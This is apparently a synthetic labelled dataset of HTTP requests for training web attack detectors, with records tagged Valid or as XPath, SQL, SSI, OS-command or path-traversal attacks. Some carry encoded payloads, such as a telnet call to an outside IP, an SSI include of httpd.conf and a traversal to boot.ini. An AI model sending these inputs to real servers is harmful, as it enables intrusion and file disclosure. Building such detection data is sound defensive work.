If-Unmodified-Since: Fri, 31 Mar 06 15:57:27 CET
If-Match: "LeAeR@A2MBHyWCHg"
If-None-Match: *
If-Range: "99JyHs9JkJ7oqCDy"
Max-Forwards: 9
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: eal9O bnowls=ziea
Authorization: Basic c2pyYTpudmFpbGVhYQ==
Range: 929-162
Referer: http://edsstcs.com/hsatr/notldutN/moaymh.gz
TE: trailers,gzip,chunked;q=0.2
Trailer: If-None-Match
User-Agent: Mozilla/8.4 (X11; U; Linux i386 7.1; mh-oe; rv:4.6.9) Gecko/77748017
UA-CPU: x86
UA-Disp: 359,4370,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7736x020
Via: 3.0 www.ofsd1.gif, 1.7 126.1.129.123, 6ts/2.4 93.148.247.97
Transfer-Encoding: 7sumxs; kdasiua4=6sbRntg
Upgrade: aebooo/7.2, mue/6.6, ojn8j/0.6, mfyon/1.0, rnik/6.0
Warning: 029 www.iriz.htm "eeghs8" 
X-Forwarded-For: 241.96.84.180
X-Serial-Number: 23762102
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28303
Start - Id: 48849
class: XPathInjection
GET /ioeypQynB9/omeseFswmcj0df/eub/VmCsVNKQjDadmin1n5c/shutdownroRfkCNin-/t4s/r@LXfMU/eZ.s/2rtULgDfDwdJwk6ldy/nxSYLeNNr1fY-/srw9jNlxzys7d.html?awn=5023783230&sblEi9GafnNiuuc=912&ioheStatidItu=78&enunnaTgmgis=60676641&ssRqHdSoEthae=+-ohc&0dInmhes=esNlcUo%27%5D+++++%7C++++P++%7C++++%2F%2Fuser%5B++++name%2Ftext%28+++%29+++%3D+++%27enns&6rNsdtenrt=8371&hiemayqamyNt=9481&q1Sr=btaEaoEltrctt&vdgrreeenhc=61720&a3Q77mv=007705&sheaetvdh=stiframeh&nSte=texecer+edprocessing-instruction%3C%26t%25y%5BW HTTP/1.1
Host: 194.216.121.100:593
Connection: ieeasti
Accept: image/jpeg;q=0.1, image/*;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=46
Client-ip: 45.241.92.24
Cookie: eneMi=fu;ecKsivso1xyvt=wget8openua2bmmone;htdoirdemHIaaa=aytTfainnsaoc;ae9ttnrwaeuatr=m2fl.sMT;smSt=20434747;uClog2=dmevgujfoecs
Cookie2: $Version="89"
Date: Tue, 24 Jun 08 13:42:23 CET
ETag: "ldC1WNmxlo0v8zvn"
Expect: 100-continue
From: w2h3rar@tkko9pi.org
If-Modified-Since: Tue, 15 Nov 05 08:11:53 UTC
If-Unmodified-Since: Mon, 09 Apr 07 08:37:48 UTC
If-Match: "qbV@.R35t14Fr5nz"
If-None-Match: *
If-Range: *
Max-Forwards: 893
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Basic aGlzMGVzM3Q6ZU5yaTJxYw==
Authorization: Basic cnNpbG86ZXNPOQ==
Range: 5-03627
Referer: /tOti7/0iEorbda/nteezt.conf
TE: gzip;q=0.8
Trailer: Accept-Language
User-Agent: r0qio/3.7
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 412x876
Via: 3.3 www.k8eekecS.shtml:61, FTP/8.6 193.19.0.134, tao/8.4 www.tilfqe5i.htm
Transfer-Encoding: tEeso8
Upgrade: qdiue/5.0
Warning: 687 108.217.115.97 "lnedeee" 
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48849
Start - Id: 39827
class: SSI
GET /hbc3ywdrArinondi.nsf?xE-A=%3C%21--+++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++--%3E&poroiaieap4=iM-32&vna3mTu=n2+uo&llr=stX&W39AhavingYwindow.opens=i%7Efoodr&crn=b%5Dnhsdnvo+ HTTP/1.0
Host: 172.82.80.114:5
Connection: close
Accept: image/*
Accept-Charset: iso-8859-8-i;q=0.2, x-mac-arabic, windows-874, iso-8859-7;q=0.7, euc-tw;q=0.4
Accept-Encoding: identity;q=0.7, deflate, deflate;q=0.3, gzip, deflate
Accept-Language: lH3eN-tccv;q=0.6, h-iexsNbx
Cache-Control: only-if-cached
Cookie: eonoiy=hlrNhpieat;o8trnfnphJ=>~[wyr 0n;2ata=?l)y3;D_1v9KwfpositionnBU=oomtulwcIupdate scuage6e;cEo9nsUce=6
Date: Wed, 30 Apr 08 11:03:38 UTC
Expect: 100-continue
If-Modified-Since: Sun, 20 Sep 09 13:58:52 UTC
If-None-Match: "JzlGIhn0gT3lm0Y@l"
Max-Forwards: 8
Authorization: Basic aWg4YTpkaThuNw==
Referer: /eablit2n/eateiud.mpeg
Trailer: Trailer
User-Agent: o6IttyiienyTbesoP
Via: 4.1 www.aropr.css
Transfer-Encoding: identity
X-Serial-Number: 46103258544750968619
----: ----------------

null

End - Id: 39827
Start - Id: 15353
class: Valid
GET /ofhfRgnmoeqtn.cfm? HTTP/1.0
Host: 245.126.205.234
Connection: close
Accept: video/quicktime, audio/basic, video/mpeg;q=0.7
Accept-Charset: x-mac-arabic
Accept-Encoding: *
Accept-Language: rlua-racS;q=0.0
Cache-Control: no-cache
Client-ip: 21.23.172.64
Cookie: neee=t7SIt/mioy
Cookie2: $Version="08"
Date: Wed, 26 Nov 08 19:47:34 UTC
ETag: "WChuex9Uu-rPBj@kl0aO"
Expect: 100-continue
From: ncm3i@noeae1erh.be
If-Modified-Since: Sun, 29 Nov 09 13:48:53 GMT
If-Unmodified-Since: Wed, 12 Sep 07 05:30:08 CET
If-Match: *
If-None-Match: "KAXOudq_qo7C4Ks"
If-Range: Sun, 04 May 08 20:13:25 GMT
Max-Forwards: 96
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/sart/maiDt4V.dll
Authorization: Digest qop=auth-int
Range: 75-,670-452322
Referer: /aXotfS/Yes4e7.rar
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/9.7 (compatible; lrd0or; Mac OS X; fadob; 1fesae; qciAe8)
UA-CPU: StrongARM
UA-Disp: 4712,7583,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 065x683
Via: 5.8 143.169.155.120:6, 4.7 167.214.208.180, HTTP/3.7 www.rEau4t.tiff:98853
Transfer-Encoding: identity
Upgrade: s4t/1.9, hd2Bwh/7.2, hS5kee/8.7, rohi/8.9, ldoan/8.8
Warning: 486 147.132.247.92 "m5pjeocbh" 
X-Forwarded-For: 139.65.0.173
X-Serial-Number: 7835814731
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 15353
Start - Id: 12965
class: Valid
GET /govCV@Zyrvx-LhclapcO/4wqhynaedxeea6/ceiElIiwnnhiRy/wtsims6raini.swf?mKGVGe5c=seapmnaziwenooierf&entaenos03e=645&mr=tneesr&LGG9location5evalisam4=i4qKvUp HTTP/1.1
Host: 120.11.216.112
Connection: close
Accept: audio/*;q=0.7, application/postscript
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, deflate, compress;q=0.7
Accept-Language: Nb6et4BD-citno;q=0.8
Cache-Control: no-transform
Client-ip: 99.225.239.171
Cookie: iim=3
Cookie2: $Version="2"
Date: Mon, 24 Apr 06 13:09:26 GMT
ETag: "dCDiiY9RB7DsOD7b"
Expect: eSicNis
From: picsvpm@izhyigm.biz
If-Modified-Since: Sat, 26 Jan 08 09:52:41 UTC
If-Unmodified-Since: Sun, 21 Jun 09 01:56:02 GMT
If-Match: "bGxmWTXlhmGk9W8pzT"
If-None-Match: *
If-Range: "dwn61ztrg6hHgoG"
Max-Forwards: 804
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZG5lYW1sb25pb0s4cnJUdW5vVG5UdGlvc2V0dGFOdEZ6
Authorization: NTLM OWhta2w4blllb2xoa25pc2VpYThob2VnaWRob2VucE5SZWluTQ==
Range: -742
Referer: http://www.neelon.it/reta/aalnTn/fIYnt/cEduestn.exe
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/8.6 (Machintosh; U; Mac OS X 7.8; sf-te; rv:9.7.9) Gecko/03836491
UA-CPU: Sparc
UA-Disp: 1205,305,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 501x762
Via: FTP/5.2 www.TlXiwttn.jpg
Transfer-Encoding: tlanE; gienx=eqamU3e
Upgrade: osnA4i/7.7, iahE/2.8, r1suiw/2.4, ignt/8.2, egc/6.3
Warning: 659 11.248.81.124 "abilo" 
X-Forwarded-For: 182.133.25.200
X-Serial-Number: 0390911132263126
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12965
Start - Id: 49165
class: XPathInjection
GET /rIC57aJ/saolh4resedeecdtefu/lsoSwnvybEus5eo/las/xke5odarihial44rPfut/htleex81v/ht.dll?wasw3roiyeh=edskaeM%3CcatinahttpssUen1&1GQQWKz=rKArre&3IqaoeeemmpfS=2ojs%5C&rtqac3t3riyim=cRE0KM_hoa&ini=647069&OSArR8object0d08V=Jipol4&rntsb=aoha7sOnoazl&Idsh=73390&ad=mrs6s%2FE%2Fsie1od%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D530%5D+++++or++%27weScdgoE%27+++%3D++%27 HTTP/1.0
Host: www.mAtlida.biz
Connection: close
Accept: video/mpeg, text/*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: deflate;q=0.3, compress, identity, deflate;q=0.3
Accept-Language: *
Cache-Control: max-stale=79152
Client-ip: 38.175.250.11
Cookie: oehS=neTchIntcaixartmy;2dnhteeee6Yrp=0;w2et= eat
Cookie2: $Version="03"
Date: Sun, 08 Feb 04 03:21:57 UTC
ETag: W/"VjavY-udlIsPEF8K8Bw"
Expect: 100-continue
From: esgt1xrh@tidc.com
If-Modified-Since: Mon, 09 Feb 09 05:34:14 CET
If-Unmodified-Since: Fri, 23 Jan 04 18:43:07 GMT
If-Match: "cgafRtAw@PKITwmwIPCU"
If-None-Match: *
If-Range: Wed, 16 May 07 15:04:46 GMT
Max-Forwards: 8861
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest response="D8e20478C93A7Ab8Ac2895c940EBEbcd"
Authorization: ptad c8aietA=roddisd
Range: -441207,31726-,-3
Referer: http://esbmzr.cz/0mcdsye.html
TE: trailers,trailers,deflate;q=0.6
Trailer: If-Range
User-Agent: r8CO.ARptC http://www.snid.cz
UA-CPU: StrongARM
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 290x3654
Via: 9.4 www.twQntldn.gif
Transfer-Encoding: gzip
Upgrade: rMm/8.7
Warning: 291 113.152.215.252 "6unhh" "Fri, 21 Oct 05 09:21:56 GMT"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 832866
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49165
Start - Id: 42242
class: SqlInjection
GET /nuhlpnI3j6/hack@3AC7MXMff/51MV@pn7/Ph/edEmoenboo3G/6hDNh/mo/5ann9geRgInlternos/mailAD/nortDe2t.bin?ircUcTlrS8r53cq=emra%2F6C1a&cn3hhtilyaS=%27+AND+++USER_NAME%28%29%3D%276ask&ertofialplHe=25&n8TMnxoeebemoso=2869410 HTTP/1.0
Host: www.Aart.ch
Connection: ttdmen
Accept: */*;q=0.0
Accept-Charset: windows-1255;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 146.242.154.41
Cookie: fra1oeos= 0etud l3ut ;DfHe1dCMjR=9;he2egNaefe=IrJe xvet-iems9
Cookie2: $Version="26"
Date: Tue, 17 Jan 06 14:00:16 CET
ETag: "AwZJ1R96_ZwyUkum"
Expect: 100-continue
From: AhkTtd8@hidg5ir.de
If-Modified-Since: Mon, 01 Dec 08 11:52:07 UTC
If-Unmodified-Since: Fri, 02 Dec 05 05:15:25 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 61
MIME-Version: 7.5
Pragma: eRot='7e9rdKid'
Proxy-Authorization: NTLM M2FlbzFvd2R2amFoamFybnhjcWx1dXRkMXZhOXhMaXRtbmtzc2RPYXBl
Authorization: jlaeo nf6ee7he=tqriai
Range: 4539-14148,-19,934-
Referer: /fetqaes/injsvo/qerbe/ApBoT0V/fb8c3.exe
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: oatfdprcl/8.7.4
UA-CPU: StrongARM
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 108x2342
Via: 9.3 www.zieguner.shtml
Transfer-Encoding: gzip
Upgrade: sssi/2.7, rim/3.4, mCeth/1.0, n82sil/5.7
Warning: 028 56.37.102.108 "t6tlhhan1eX2IilnhgP" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42242
Start - Id: 43162
class: OsCommanding
GET /z_NDoYwqseZ/fKw@CpJS/eQaLcU5nTVh3cJPp/gusX6qRqpDiD8cZ/her2a3a8lWg5yeeIe/m8el_JZ/K51@Areplaced0NI/qMqGWA/ITFjFpsincludeDTE/f7hbestEwosmfsp/EenKRmrctLatnnor/aerNhe8ebsun.cgi?SezR5dWe=egJskJ4S.rV&legmd=569408&GKicmdQ8locationb=22769988&a1etorpGi0R=update+iM%5CTecOa&f-zYdo@=9ief&4tivuteIthr=naccepto6imiaR&oicrift1nNcdRor=%22%3B+++telnet++++81.46.92.31++80+++%3B&d8theyWrA=25080&dit=710&ot3=stmo&el6mt8Erumleet=22&DSreplacelobject=xcwi%3De HTTP/1.1
Host: www.mbt0ri.it
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255;q=0.7, iso-8859-5;q=0.2, big5;q=0.1, windows-1254
Accept-Encoding: compress;q=0.8
Accept-Language: len-7e2fr, be9oaati-hrj;q=0.3
Cache-Control: no-cache
Client-ip: 231.103.210.133
Cookie: bng9onasaisSt1=9;z9-X.Yswcg.=7
Cookie2: $Version="1"
Date: Tue, 19 Jan 10 11:55:54 CET
ETag: "2HaIWcgvC5CU6XU"
Expect: ucdhrA
From: Thwz@uroeopi4.net
If-Modified-Since: Sun, 26 Feb 06 21:39:30 GMT
If-Unmodified-Since: Thu, 04 Jan 07 23:29:44 UTC
If-Match: *
If-None-Match: "j-ljsJ@xEv8XVTh"
If-Range: *
Max-Forwards: 77
MIME-Version: 9.5
Pragma: e6d3abio='msrWlna'
Proxy-Authorization: Basic OWFyMXVlZDo2cnBobg==
Authorization: sunut6 3loaTnu4=nkxLfet
Range: 28678-4,-886
Referer: http://www.e5ksarhe.de/ylymcdt/ftlus/ilbn2/oo5ht/AbtcngA.php4
TE: chunked;q=0.8
Trailer: If-Match
User-Agent: NmyeHe1njTse
UA-CPU: Sparc
UA-Disp: 6178,9185,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 807x674
Via: 3.3 www.ijt39.css:6180
Transfer-Encoding: compress
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43162
Start - Id: 5575
class: Valid
PUT /m27tZg@rf1/a9RpONG8oQLh/7WEyKO/tTBaGI2h9/h9olyDQ57VsX/eOrRt.png? HTTP/1.0
Content-Length: 93
Content-Language: NvitOn0n
Content-Encoding: compress
Content-Location: /itnadin/sE9e/dirnso7n/annosqe/eanaeetg.asmx
Content-MD5: b3JmaWV5d0RtdHl5ZWV3YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Oct 07 22:54:10 GMT
Last-Modified: Sun, 08 Oct 06 18:51:09 UTC
Host: 119.126.21.243
Connection: keep-alive
Accept: video/*, application/x-tar;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.2, identity, gzip, deflate
Accept-Language: *
Cache-Control: max-stale
Client-ip: 191.224.243.87
Cookie: eeotoip5=lij68vhr4eniclFs;hery1wtme=Ao;ThsbolaarPgG0c=19000
Cookie2: $Version="811"
Date: Sun, 04 Jan 09 03:35:55 UTC
ETag: "Qmut.ACnB-6iZ7xSVgG"
Expect: ascb=ueso
From: ddE5mq0u@tano2i.be
If-Modified-Since: Wed, 24 Dec 08 09:43:12 UTC
If-Unmodified-Since: Tue, 16 Dec 08 24:22:03 UTC
If-Match: "KdVHw.7@PetsQDjOqxZ"
If-None-Match: "gTP1i3oW@BdDyvM2394F"
If-Range: "oDFmPkS1WXzmpPW7H_"
Max-Forwards: 809
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest qop=mtRe1ec
Authorization: Digest uri=/6shwd/sormr/brtcwhen.txt
Range: 673-
Referer: http://www.HvsG.com/trweHhx.jsp
TE: deflate
Trailer: Referer
User-Agent: uomTsNmer0abyns
UA-CPU: x86
UA-Disp: 611,828,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6340x801
Via: 4.9 205.41.102.25, iiH/5.9 www.euht.jpeg
Transfer-Encoding: gzip
Upgrade: aCrv/3.2, uNt/4.1, agThej/0.7
Warning: 189 www.tsXitt6.gif "8U5tatshea" 
X-Forwarded-For: 26.9.191.248
X-Serial-Number: 07654558799930280172
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

elnnU=ie@Et&3wnikthiz7i=lXocBQ4vY&aniser=o/u&csnpAtolpoOssba=pFyFVOt&uvptiaw1ntck=1884989

End - Id: 5575
Start - Id: 22250
class: Valid
GET /En/i4d35fopTdmv0WuHaM/ttovEeht9t/niagsmrPaleu4ea7/t0atre.tiff? HTTP/1.0
Host: www.ebstjaa2.ch:80
Connection: atx3
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.1
Accept-Language: q2h-tam5Sn, uaxu-lu2qdyh, jlett-6nuhohom
Cache-Control: max-stale
Client-ip: 81.203.54.190
Cookie: tngT4Hcu=ncn%6Nm e\egroup by>Acespositionftp;6itunhe9pE=aemp6eoeityyTe;aenri=N3 
Cookie2: $Version="59"
Date: Fri, 07 Oct 05 19:15:38 CET
ETag: W/"8rDlKlxFywn4a_UjV6P0"
Expect: ljhEdvL
From: orEtts@ismhaeter.de
If-Modified-Since: Sun, 31 May 09 04:49:31 GMT
If-Unmodified-Since: Tue, 24 Jun 08 11:40:56 CET
If-Match: "pSpZeEZ1PcuO3wO.v2T"
If-None-Match: "ttxIPE17reuLrO."
If-Range: "t1oHWKHsTq1CWfQK"
Max-Forwards: 84
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: ngoFt8 taaec=t7nymEoi
Authorization: Digest opaque="oWtn"
Range: 00-
Referer: http://www.ushErpl.de/c0Aet/Hoof3Wb8/mfsm/eetidc/reeoce.bin
TE: trailers
Trailer: TE
User-Agent: Mozilla/6.3 (Windows; U; Win98 6.4; eu-la; rv:0.6.2) Gecko/99041685
UA-CPU: MIPS
UA-Disp: 204,827,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 196x167
Via: 9.9 www.s3eNlo.png, 0.1 98.253.114.105:747
Transfer-Encoding: compress
Upgrade: 7uo/5.0, nadyvi/1.3, iiem/5.7, lCt/7.8, eclh/5.0
Warning: 625 www.bcOiE.htm:75 "aNlih4dh3" "Fri, 31 Mar 06 08:32:01 UTC"
X-Forwarded-For: 83.236.39.135
X-Serial-Number: 35178476793
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22250
Start - Id: 8779
class: Valid
GET /isztEiures9ngrthM/I5oEeyexQzahea7adsn/dut0alzEo3/3oeP/z6dxP.jpg?dTSwinntgboFD=8&-J%uobjectbr=a%26t%5Btmpuvbscript+&sAVmRLOQRz=39302&aiahRant=ulocation&emm=e7SjOinaLoewhpd&Iqiu=9enKee39&wnblthEbeahScwc=3ilhyIngesem+j&huo9sLses=6&brut=3jr%29&jrrSeash5olT4=wTpmerdqbetween&eaaRyith=4730418&4shhrfees=ivininr%5Da HTTP/1.1
Host: www.orfXtds4.de
Connection: twtwt
Accept: audio/basic, audio/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=62
Client-ip: 184.38.170.151
Cookie: IeTLeaehoqtsutx=3874188;owzkN5siltitia=auYGl@tTot9l;edinbbh3Sxs=99619263;.-PB=976532;e6eas=zfk8z;ag2l=Eia
Cookie2: $Version="39"
Date: Tue, 23 Mar 04 10:38:52 UTC
ETag: "fce7_Rvgq32my2N"
Expect: 100-continue
From: ytshor@Dl5ho0zri.ch
If-Modified-Since: Thu, 22 Sep 05 10:39:47 GMT
If-Unmodified-Since: Fri, 11 Jun 04 06:47:26 GMT
If-Match: "GiBpV7ySLsRQiIc_"
If-None-Match: *
If-Range: *
Max-Forwards: 53
MIME-Version: 1.9
Pragma: 9ndr2reu='1iy'
Proxy-Authorization: Basic OWVxbjplZUJBaA==
Authorization: Basic dEJzOHl0Om9lYWU5
Range: -87767
Referer: /i6hmcld/niopst/3iirbw.tar.gz
TE: chunked,deflate;q=0.0
Trailer: Accept-Encoding
User-Agent: Mozilla/7.0 (X11; U; SunOS sun4u 4.0; ec-ts; rv:8.7.1) Gecko/28921897
UA-CPU: 68000
UA-Disp: 735,9558,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 633x2304
Via: HTTP/6.1 162.233.146.238, 1.5 www.9rdoAox.tiff
Transfer-Encoding: gzip
Upgrade: T1aR/3.7
Warning: 295 www.nais.htm "ioTseniTrnsie" 
X-Forwarded-For: 71.221.125.93
X-Serial-Number: 28573562
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 8779
Start - Id: 29989
class: Valid
GET /9ZlshomejhdvX-Bxr7i/t_sOaU2-v/mZPD/c43zTgumhqI/tym4tM/goo/5VnRluxPi2U1aFsd.mspx?ietowdi=dkgX&7t7ioahong=fesipn&h7re=scriptteo&rano=entiACqa&s6ai48e1ulempas=w+Host0es&fralvec=tstrconnectn+&NnunasHErdei=3&eLammttmX=wrh_.6%40Uz.&p2oesEn=ta.-Ot9&ElQ9Jeozt=2049940269&Nsn43gTr5o=7Atg%3F&elg=h%2Biahoai2uR&taic0oltnri=43921&eThn72efweD=%25ubftpedgc9nWd&oYirnxtom7fm=od5Iyza4Bh0S HTTP/1.1
Host: 144.215.173.37
Connection: ueehh
Accept: application/rtf;q=0.2, video/quicktime, audio/x-wav;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: gmat9-eeoiqcdd;q=0.2, jdo-erioctn;q=0.3, it1sl-aih;q=0.2
Cache-Control: max-stale
Client-ip: 26.168.29.0
Cookie: dropHQxGkE6=734477
Cookie2: $Version="37"
Date: Sun, 24 Oct 04 24:20:53 UTC
ETag: W/"fnhW4l9xoRI1Yd0oZJ"
Expect: oAlen
From: h2entn@Tho3eeri.com
If-Modified-Since: Mon, 04 Oct 04 08:49:17 UTC
If-Unmodified-Since: Wed, 11 Feb 09 11:48:09 CET
If-Match: *
If-None-Match: "pa6UBeGlNv4kOMH"
If-Range: Sat, 12 Apr 08 22:07:35 UTC
Max-Forwards: 0715
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: rrrf natgEri=u7aTNgi8
Authorization: cardD hetpfto=MnI4aa
Range: 89712-
Referer: http://www.0ireA.com/1eqe/1eryqTx.conf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: talwtco/5.4
UA-CPU: PowerPC
UA-Disp: 644,8528,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 219x466
Via: FTP/1.8 61.232.159.104, msc/5.6 www.eotaeA.png, 3.6 143.42.8.238
Transfer-Encoding: compress
Upgrade: eds/9.2, isa/3.3, kej/9.4
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 69.246.154.213
X-Serial-Number: 2857393
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29989
Start - Id: 45495
class: PathTransversal
GET /zDxsystemY412V6FNI8.pl?sxjOwindow.open=uvncuHghedraakmn&3mlprei=R%3A%5Cwindows%5Cboot.ini&eeyLi=eu42s&uqismne17B=hssamjern%2Beonar5U&YJ@swindow.opent7qhtpass=06ivYmc&oluRUsHhe=mkHqEHUD&ep=9ogbin&CHKRqVcmduh.zE=8312661&rau5fezdihavwdu=98763 HTTP/1.1
Host: www.bauEmkto2.cz:431
Connection: xes5eft
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 165.251.254.128
Cookie: rmTesatztRg5Eo=76916
Cookie2: $Version="05"
Date: Sat, 13 May 06 03:03:54 GMT
ETag: "SQQiLGzppLASCU-m"
Expect: 100-continue
From: rddIbt@n7reian.st
If-Modified-Since: Mon, 21 Mar 05 05:10:53 GMT
If-Unmodified-Since: Wed, 30 Nov 05 01:59:32 GMT
If-Match: *
If-None-Match: *
If-Range: "WJuNZph3I_LEhQN8"
Max-Forwards: 98
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM VXRlZ290YnM0YU50ZjJsSWNoc3RqSWxtc2lvZU9pbXJuRWU=
Authorization: ftsb tthhtw=otis
Range: 65-,-906
Referer: http://oevts.ch/luoaan.jpg
TE: trailers,trailers
Trailer: Warning
User-Agent: 1ttsbevR
UA-CPU: MIPS
UA-Disp: 187,4216,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6084x210
Via: struo7/5.0 207.158.9.141:009
Transfer-Encoding: deflate
Upgrade: drf/1.3, eoe/9.9
Warning: 402 1.54.207.201 "lrklpe" 
X-Forwarded-For: 62.58.132.17
X-Serial-Number: 8223453
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45495
Start - Id: 48445
class: XPathInjection
GET /b0CdL_OyJ0V/ehF/nypNOwd/LJyPZJT.jpeg?sEgtt=r0R51aaOn&hroetY39ujh=rhJSn7&elggr=in70nLuNmocha9rheTlmonull9q%29&nLfriau6eueciaj=awinntye%2FduR HTTP/1.1
Host: 218.47.29.78:80
Connection: 5swerthb
Accept: */*
Accept-Charset: cp-932, windows-1257;q=0.1, x-mac-greek
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=9
Client-ip: 149.84.157.200
Cookie: 70oeanje=dBle3a'  or 3ensey/du/child::node()[processing-instruction()=11]     or   'us1cse'    =   ';nznewd1oib=gpEQuheKkPG.;ef=h;xhiUredr=3@en9cedt
Cookie2: $Version="085"
Date: Thu, 07 Aug 08 03:49:12 UTC
ETag: "QPi@q9V3sQ92TyLQ"
Expect: aehiyth=1ref;rnpuReyt=b5ljiw
From: sSemrt@seimn8nif4.com
If-Modified-Since: Tue, 12 Oct 04 23:54:36 UTC
If-Unmodified-Since: Fri, 24 Apr 09 17:46:49 UTC
If-Match: "Pgl9uEl35bbS4kBAu"
If-None-Match: *
If-Range: Tue, 29 Dec 09 17:53:25 CET
Max-Forwards: 615
MIME-Version: 9.5
Pragma: ss=hodcd5sz
Proxy-Authorization: NTLM MkxZYW80ZWhlb2xodWl0YW9pc29wMXNBb2x0M29udGVub1IwbmhoRVZhc2Zld2M=
Authorization: 7se2m intoj5tr=nkeente
Range: 195-,31437-
Referer: /mnvii/hn5ef3rl.wav
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/9.8 (X11; U; Linux i586 0.0; ra-ot; rv:4.6.5) Gecko/39865788
UA-Disp: 5178,273,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 348x583
Via: 8.5 61.142.72.91:0195
Transfer-Encoding: identity
Upgrade: rtyfAi/5.9
Warning: 787 www.nspetr.htm "homtzfS" 
X-Forwarded-For: 152.33.64.46
X-Serial-Number: 30614
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48445
Start - Id: 26619
class: Valid
GET /epRecsiS/gOS-aNCR/twr/LpWfBpbk/ftpR7FBm.php4?9Qeaasooorm=787102683&poepsiyenOHoq=09130&esOotoicnEp=7+bohansHwindow.open&fNHnetcatpkP3w.=ez.BHHxxbO3&o3Ionst62iey=cd-DKL.0Reft&h6irnwOk1sBt=o0r&Ooe2biholTiat=9 HTTP/1.0
Host: www.Iewnn.de:80
Connection: keep-alive
Accept: application/*
Accept-Charset: x-mac-greek;q=0.5, iso-10646-ucs-2;q=0.6, iso-8859-1, utf-8
Accept-Encoding: 
Accept-Language: x-r
Cache-Control: min-fresh=0
Client-ip: 147.16.61.41
Cookie: ot9=a4sin@;scTeets=euXdaB;dP.2Z5UCselectT5=0dy;g;ebx5btahfo=ei
Cookie2: $Version="901"
Date: Thu, 08 Sep 05 20:09:48 CET
ETag: W/"ET8PB8@zCmfVZdsF8cA"
Expect: eEmeoia
From: ceebh8z@anOtt1nhog.cz
If-Modified-Since: Sat, 27 Aug 05 07:14:44 GMT
If-Unmodified-Since: Sat, 01 Oct 05 02:27:47 GMT
If-Match: *
